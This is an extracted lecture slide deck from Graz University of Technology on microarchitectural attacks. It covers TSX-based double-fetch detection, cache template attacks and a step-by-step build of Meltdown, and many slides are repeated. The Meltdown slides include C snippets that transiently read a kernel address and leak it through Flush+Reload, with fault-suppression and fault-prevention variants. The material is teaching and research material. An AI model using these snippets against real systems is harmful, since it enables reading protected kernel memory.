→ Another microarchitectural feature: Intel TSX
40 Daniel Gruss — Graz University of Technology
![Page 195: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/195.jpg)
Getting rid of Double Fetch Bugs www.tugraz.at
• Problem: modified value → exploit
• Idea: Ensure that both accesses are atomic
→ Another microarchitectural feature: Intel TSX
40 Daniel Gruss — Graz University of Technology
![Page 196: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/196.jpg)
Hardware Transactional Memory www.tugraz.at
• Make a sequence of reads and writes atomic
• Operations are wrapped in a transaction
• Conflicts → transaction is rolled back
• Implemented via the cache
41 Daniel Gruss — Graz University of Technology
![Page 197: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/197.jpg)
Hardware Transactional Memory www.tugraz.at
• Make a sequence of reads and writes atomic
• Operations are wrapped in a transaction
• Conflicts → transaction is rolled back
• Implemented via the cache
41 Daniel Gruss — Graz University of Technology
![Page 198: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/198.jpg)
Hardware Transactional Memory www.tugraz.at
• Make a sequence of reads and writes atomic
• Operations are wrapped in a transaction
• Conflicts → transaction is rolled back
• Implemented via the cache
41 Daniel Gruss — Graz University of Technology
![Page 199: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/199.jpg)
Hardware Transactional Memory www.tugraz.at
• Make a sequence of reads and writes atomic
• Operations are wrapped in a transaction
• Conflicts → transaction is rolled back
• Implemented via the cache
41 Daniel Gruss — Graz University of Technology
![Page 200: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/200.jpg)
Transactional Memory www.tugraz.at
Thread 1Thread 0 Cache
42 Daniel Gruss — Graz University of Technology
![Page 201: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/201.jpg)
Transactional Memory www.tugraz.at
Thread 1Thread 0 Cache
xbegin
xend
else pathof xbegin
42 Daniel Gruss — Graz University of Technology
![Page 202: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/202.jpg)
Transactional Memory www.tugraz.at
Thread 1Thread 0 Cache
mov
xbegin
mov
xend
else pathof xbegin
read read
data
read set
42 Daniel Gruss — Graz University of Technology
![Page 203: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/203.jpg)
Transactional Memory www.tugraz.at
Thread 1Thread 0 Cache
mov
mov
xbegin
mov
mov
xend
else pathof xbegin
data
read read
dataread
data
write
read set
42 Daniel Gruss — Graz University of Technology
![Page 204: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/204.jpg)
Transactional Memory www.tugraz.at
Thread 1Thread 0 Cache
mov
mov
mov
xbegin
mov
mov
mov
xend
else pathof xbegin
data
read read
dataread
data
write
read write
read set
42 Daniel Gruss — Graz University of Technology
![Page 205: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/205.jpg)
Transactional Memory www.tugraz.at
Thread 1Thread 0 Cache
mov
mov
mov
xbegin
mov
mov
mov
xend
else pathof xbegin
data
read read
dataread
data
write
read write
transactional abort read set
42 Daniel Gruss — Graz University of Technology
![Page 206: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/206.jpg)
Transactional Memory www.tugraz.at
Thread 1Thread 0 Cache
mov
mov
mov
xbegin
mov
mov
mov
xend
else pathof xbegin
data
read read
dataread
data
write
read write
transactional abort read set
First access
42 Daniel Gruss — Graz University of Technology
![Page 207: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/207.jpg)
Transactional Memory www.tugraz.at
Thread 1Thread 0 Cache
mov
mov
mov
xbegin
mov
mov
mov
xend
else pathof xbegin
data
read read
dataread
data
write
read write
transactional abort read set
First access
Modification
42 Daniel Gruss — Graz University of Technology
![Page 208: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/208.jpg)
Transactional Memory www.tugraz.at
Thread 1Thread 0 Cache
mov
mov
mov
xbegin
mov
mov
mov
xend
else pathof xbegin
data
read read
dataread
data
write
read write
transactional abort read set
First access
Second access Modification
42 Daniel Gruss — Graz University of Technology
![Page 209: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/209.jpg)
Transactional Memory www.tugraz.at
Thread 1Thread 0 Cache
mov
mov
mov
xbegin
mov
mov
mov
xend
else pathof xbegin
data
read read
dataread
data
write
read write
transactional abort read set
First access
Second access Modification
Exploit detected
42 Daniel Gruss — Graz University of Technology
![Page 210: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/210.jpg)
Microarchitectural Defenses www.tugraz.at
• device under test = measurement device
→ software defenses are possible
• e.g., make sure attacker can’t compute in parallel to victim
• how would that work in the physical world?
43 Daniel Gruss — Graz University of Technology
![Page 211: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/211.jpg)
Microarchitectural Defenses www.tugraz.at
• device under test = measurement device
→ software defenses are possible
• e.g., make sure attacker can’t compute in parallel to victim
• how would that work in the physical world?
43 Daniel Gruss — Graz University of Technology
![Page 212: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/212.jpg)
Microarchitectural Defenses www.tugraz.at
• device under test = measurement device
→ software defenses are possible
• e.g., make sure attacker can’t compute in parallel to victim
• how would that work in the physical world?
43 Daniel Gruss — Graz University of Technology
![Page 213: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/213.jpg)
Microarchitectural Defenses www.tugraz.at
• device under test = measurement device
→ software defenses are possible
• e.g., make sure attacker can’t compute in parallel to victim
• how would that work in the physical world?
43 Daniel Gruss — Graz University of Technology
![Page 214: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/214.jpg)
Microarchitectural Defenses www.tugraz.at
• device under test = measurement device
→ software defenses are possible
• e.g., make sure attacker can’t compute in parallel to victim
• how would that work in the physical world?
43 Daniel Gruss — Graz University of Technology
![Page 215: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/215.jpg)
Microarchitectural Defenses www.tugraz.at
• device under test = measurement device
→ software defenses are possible
• e.g., make sure attacker can’t compute in parallel to victim
• how would that work in the physical world?
43 Daniel Gruss — Graz University of Technology
![Page 216: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/216.jpg)
Microarchitectural Defenses www.tugraz.at
• device under test = measurement device
→ software defenses are possible
• e.g., make sure attacker can’t compute in parallel to victim
• how would that work in the physical world?
43 Daniel Gruss — Graz University of Technology
![Page 217: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/217.jpg)
Spatial Component www.tugraz.at
• physical: different offsets on the chip
• microarchitectural:
• different microarchitectural elements
• more significant: huge virtual adress space
• 248 different virtual memory locations
• the location is often (part of) the secret
44 Daniel Gruss — Graz University of Technology
![Page 218: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/218.jpg)
Spatial Component www.tugraz.at
• physical: different offsets on the chip
• microarchitectural:
• different microarchitectural elements
• more significant: huge virtual adress space
• 248 different virtual memory locations
• the location is often (part of) the secret
44 Daniel Gruss — Graz University of Technology
![Page 219: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/219.jpg)
Spatial Component www.tugraz.at
• physical: different offsets on the chip
• microarchitectural:
• different microarchitectural elements
• more significant: huge virtual adress space
• 248 different virtual memory locations
• the location is often (part of) the secret
44 Daniel Gruss — Graz University of Technology
![Page 220: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/220.jpg)
Spatial Component www.tugraz.at
• physical: different offsets on the chip
• microarchitectural:
• different microarchitectural elements
• more significant: huge virtual adress space
• 248 different virtual memory locations
• the location is often (part of) the secret
44 Daniel Gruss — Graz University of Technology
![Page 221: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/221.jpg)
Spatial Component www.tugraz.at
• physical: different offsets on the chip
• microarchitectural:
• different microarchitectural elements
• more significant: huge virtual adress space
• 248 different virtual memory locations
• the location is often (part of) the secret
44 Daniel Gruss — Graz University of Technology
![Page 222: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/222.jpg)
Spatial Component www.tugraz.at
• physical: different offsets on the chip
• microarchitectural:
• different microarchitectural elements
• more significant: huge virtual adress space
• 248 different virtual memory locations
• the location is often (part of) the secret
44 Daniel Gruss — Graz University of Technology
![Page 223: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/223.jpg)
Spatial Component www.tugraz.at
• physical: different offsets on the chip
• microarchitectural:
• different microarchitectural elements
• more significant: huge virtual adress space
• 248 different virtual memory locations
• the location is often (part of) the secret
44 Daniel Gruss — Graz University of Technology
![Page 224: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/224.jpg)
Spatial Component www.tugraz.at
• physical: different offsets on the chip
• microarchitectural:
• different microarchitectural elements
• more significant: huge virtual adress space
• 248 different virtual memory locations
• the location is often (part of) the secret
44 Daniel Gruss — Graz University of Technology
![Page 225: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/225.jpg)
Spatial Component www.tugraz.at
• physical: different offsets on the chip
• microarchitectural:
• different microarchitectural elements
• more significant: huge virtual adress space
• 248 different virtual memory locations
• the location is often (part of) the secret
44 Daniel Gruss — Graz University of Technology
![Page 226: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/226.jpg)
Cache Template Attack Demo
![Page 227: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/227.jpg)
Cache Template5 www.tugraz.at
Address
Keyg h i j k l m n o p q r s t u v w x y z
0x7c6800x7c6c00x7c7000x7c7400x7c7800x7c7c00x7c8000x7c8400x7c8800x7c8c00x7c9000x7c9400x7c9800x7c9c00x7ca000x7cb800x7cc400x7cc800x7ccc00x7cd00
5Daniel Gruss et al. Cache Template Attacks: Automating Attacks on Inclusive Last-Level Caches. In:
USENIX Security Symposium. 2015.
46 Daniel Gruss — Graz University of Technology
![Page 228: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/228.jpg)
Side-Channel Attacks and Fault Attacks?
![Page 229: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/229.jpg)
Attack Categories www.tugraz.at
Physical
• Side-channel attacks
• Fault attacks
• What about cold boot attacks? [Hal+09]
Microarchitectural
• Side-channel attacks
• Fault attacks
• What about Meltdown/Spectre? [Lip+18; Koc+19]
47 Daniel Gruss — Graz University of Technology
![Page 230: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/230.jpg)
Attack Categories www.tugraz.at
Physical
• Side-channel attacks
• Fault attacks
• What about cold boot attacks? [Hal+09]
Microarchitectural
• Side-channel attacks
• Fault attacks
• What about Meltdown/Spectre? [Lip+18; Koc+19]
47 Daniel Gruss — Graz University of Technology
![Page 231: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/231.jpg)
Attack Categories www.tugraz.at
Physical
• Side-channel attacks
• Fault attacks
• What about cold boot attacks? [Hal+09]
Microarchitectural
• Side-channel attacks
• Fault attacks
• What about Meltdown/Spectre? [Lip+18; Koc+19]
47 Daniel Gruss — Graz University of Technology
![Page 232: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/232.jpg)
Attack Categories www.tugraz.at
Physical
• Side-channel attacks
• Fault attacks
• What about cold boot attacks? [Hal+09]
Microarchitectural
• Side-channel attacks
• Fault attacks
• What about Meltdown/Spectre? [Lip+18; Koc+19]
47 Daniel Gruss — Graz University of Technology
![Page 233: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/233.jpg)
Attack Categories www.tugraz.at
Physical
• Side-channel attacks
• Fault attacks
• What about cold boot attacks? [Hal+09]
Microarchitectural
• Side-channel attacks
• Fault attacks
• What about Meltdown/Spectre? [Lip+18; Koc+19]
47 Daniel Gruss — Graz University of Technology
![Page 234: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/234.jpg)
Attack Categories www.tugraz.at
Physical
• Side-channel attacks
• Fault attacks
• What about cold boot attacks? [Hal+09]
Microarchitectural
• Side-channel attacks
• Fault attacks
• What about Meltdown/Spectre? [Lip+18; Koc+19]
47 Daniel Gruss — Graz University of Technology
![Page 235: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/235.jpg)
Attack Categories www.tugraz.at
Physical
• Side-channel attacks
• Fault attacks
• What about cold boot attacks? [Hal+09]
Microarchitectural
• Side-channel attacks
• Fault attacks
• What about Meltdown/Spectre? [Lip+18; Koc+19]
47 Daniel Gruss — Graz University of Technology
![Page 236: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/236.jpg)
Out-of-order state does not become architecturally visible
but . . .
![Page 237: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/237.jpg)
Out-of-order state does not become architecturally visible
but . . .
![Page 238: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/238.jpg)
Building Meltdown www.tugraz.at
*( volatile char*) 0;
array [84 * 4096] = 0;
48 Daniel Gruss — Graz University of Technology
![Page 239: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/239.jpg)
Building Meltdown www.tugraz.at
• Flush+Reload over all pages of the array
0 50 100 150 200 250
300
400
500
PageA
cces
sti
me
[cyc
les]
• “Unreachable” code line was actually executed
• Exception was only thrown afterwards
49 Daniel Gruss — Graz University of Technology
![Page 240: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/240.jpg)
Building Meltdown www.tugraz.at
• Flush+Reload over all pages of the array
0 50 100 150 200 250
300
400
500
PageA
cces
sti
me
[cyc
les]
• “Unreachable” code line was actually executed
• Exception was only thrown afterwards
49 Daniel Gruss — Graz University of Technology
![Page 241: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/241.jpg)
Building Meltdown www.tugraz.at
• Flush+Reload over all pages of the array
0 50 100 150 200 250
300
400
500
PageA
cces
sti
me
[cyc
les]
• “Unreachable” code line was actually executed
• Exception was only thrown afterwards
49 Daniel Gruss — Graz University of Technology
![Page 242: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/242.jpg)
Building Meltdown www.tugraz.at
• Out-of-order instructions leave microarchitectural traces
• We can see them for example through the cache
• Give such instructions a name: transient instructions
• We can indirectly observe the execution of transient instructions
50 Daniel Gruss — Graz University of Technology
![Page 243: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/243.jpg)
Building Meltdown www.tugraz.at
• Out-of-order instructions leave microarchitectural traces
• We can see them for example through the cache
• Give such instructions a name: transient instructions
• We can indirectly observe the execution of transient instructions
50 Daniel Gruss — Graz University of Technology
![Page 244: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/244.jpg)
Building Meltdown www.tugraz.at
• Out-of-order instructions leave microarchitectural traces
• We can see them for example through the cache
• Give such instructions a name: transient instructions
• We can indirectly observe the execution of transient instructions
50 Daniel Gruss — Graz University of Technology
![Page 245: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/245.jpg)
Building Meltdown www.tugraz.at
• Out-of-order instructions leave microarchitectural traces
• We can see them for example through the cache
• Give such instructions a name: transient instructions
• We can indirectly observe the execution of transient instructions
50 Daniel Gruss — Graz University of Technology
![Page 246: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/246.jpg)
Building Meltdown www.tugraz.at
• Add another layer of indirection to test
char data = *(char*) 0xffffffff81a000e0;
array[data * 4096] = 0;
• Then check whether any part of array is cached
51 Daniel Gruss — Graz University of Technology
![Page 247: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/247.jpg)
Building Meltdown www.tugraz.at
• Add another layer of indirection to test
char data = *(char*) 0xffffffff81a000e0;
array[data * 4096] = 0;
• Then check whether any part of array is cached
51 Daniel Gruss — Graz University of Technology
![Page 248: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/248.jpg)
Building Meltdown www.tugraz.at
• Flush+Reload over all pages of the array
0 50 100 150 200 250
300
400
500
PageA
cces
sti
me
[cyc
les]
• Index of cache hit reveals data
• Permission check is in some cases not fast enough
52 Daniel Gruss — Graz University of Technology
![Page 249: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/249.jpg)
Building Meltdown www.tugraz.at
• Flush+Reload over all pages of the array
0 50 100 150 200 250
300
400
500
PageA
cces
sti
me
[cyc
les]
• Index of cache hit reveals data
• Permission check is in some cases not fast enough
52 Daniel Gruss — Graz University of Technology
![Page 250: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/250.jpg)
![Page 251: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/251.jpg)
![Page 252: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/252.jpg)
![Page 253: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/253.jpg)
Details: Exception Handling www.tugraz.at
• Basic Meltdown code leads to a crash (segfault)
• How to prevent the crash?
Fault
Handling
Fault
Suppression
Fault
Prevention
55 Daniel Gruss — Graz University of Technology
![Page 254: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/254.jpg)
Details: Exception Handling www.tugraz.at
• Basic Meltdown code leads to a crash (segfault)
• How to prevent the crash?
Fault
Handling
Fault
Suppression
Fault
Prevention
55 Daniel Gruss — Graz University of Technology
![Page 255: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/255.jpg)
Details: Exception Handling www.tugraz.at
• Basic Meltdown code leads to a crash (segfault)
• How to prevent the crash?
Fault
Handling
Fault
Suppression
Fault
Prevention
55 Daniel Gruss — Graz University of Technology
![Page 256: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/256.jpg)
Meltdown with Fault Suppression www.tugraz.at
• Intel TSX to suppress exceptions instead of signal handler
if(xbegin () == XBEGIN_STARTED) {
char secret = *(char*) 0xffffffff81a000e0;
array[secret * 4096] = 0;
xend();
}
for (size_t i = 0; i < 256; i++) {
if (flush_and_reload(array + i * 4096) == CACHE_HIT) {
printf("%c\n", i);
}
}
56 Daniel Gruss — Graz University of Technology
![Page 257: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/257.jpg)
Meltdown with Fault Prevention www.tugraz.at
• Speculative execution to prevent exceptions
int speculate = rand() % 2;
size_t address = (0 xffffffff81a000e0 * speculate) +
(( size_t)&zero * (1 - speculate));
if(! speculate) {
char secret = *(char*) address;
array[secret * 4096] = 0;
}
for (size_t i = 0; i < 256; i++) {
if (flush_and_reload(array + i * 4096) == CACHE_HIT) {
printf("%c\n", i);
}
}
57 Daniel Gruss — Graz University of Technology
![Page 258: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/258.jpg)
Foreshadow / Foreshadow-NG6 [Van+18; Wei+18] www.tugraz.at
6Jo Van Bulck et al. Foreshadow: Extracting the Keys to the Intel SGX Kingdom with Transient
Out-of-Order Execution. In: USENIX Security Symposium. 2018.
58 Daniel Gruss — Graz University of Technology
